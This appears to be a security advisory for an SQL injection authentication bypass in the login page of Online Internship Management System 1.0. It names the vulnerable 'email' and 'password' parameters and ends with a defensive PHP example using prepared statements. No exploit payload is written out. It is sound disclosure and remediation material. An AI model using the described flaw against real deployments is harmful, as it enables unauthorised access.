Vendor: Online Internship Management System
By: Christian Vierschilling
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Online Internship Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:online_internship_management_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: PHP 7.4.14, Linux x64_x86
2021
Online Internship Management System 1.0 – 'email' SQL injection Auth Bypass
The application contains SQL injection vulnerabilities in the 'email' and 'password' parameters of the file 'login.php'. The injection in the 'email' parameter can be exploited with a curl request to bypass authentication.
Mitigation:
The vulnerability can be patched by sanitizing the user input in the parameters 'email' and 'password' in the file 'login.php'.
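
One way to apply this mitigation, as an added example (not the application's own code, which this page does not show): a login check that binds 'email' through a prepared statement and compares the password against a stored hash instead of placing it in the query. The `users` table, its columns, the `authenticate` function and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
// Added example, not code from Online Internship Management System.
// Assumed schema: table `users` with columns `id`, `email`, `password_hash`.
declare(strict_types=1);

function authenticate(PDO $db, string $email, string $password): ?int
{
    // Reject values that are not syntactically valid addresses before querying.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // Bound placeholder: the value travels as data and is never parsed as SQL,
    // so quotes or comment markers in it cannot change the query structure.
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The password never enters the SQL text; it is checked against the hash in PHP.
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    return (int) $row['id'];
}

// Constructed demo data in an in-memory SQLite database (needs the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE, password_hash TEXT)');
$insert = $db->prepare('INSERT INTO users (email, password_hash) VALUES (?, ?)');
$insert->execute(['intern@example.com', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Valid credentials for the constructed user.
var_dump(authenticate($db, 'intern@example.com', 'correct horse'));
// Known address, wrong password.
var_dump(authenticate($db, 'intern@example.com', 'wrong'));
// An address containing a quote character is looked up literally, not interpreted.
var_dump(authenticate($db, "o'neil@example.com", 'anything'));
// Input that is not an email address is refused before any query runs.
var_dump(authenticate($db, 'not-an-address', 'anything'));
```

The same pattern applies with mysqli or PDO against MySQL: keep the SQL text constant and pass 'email' only as a bound parameter.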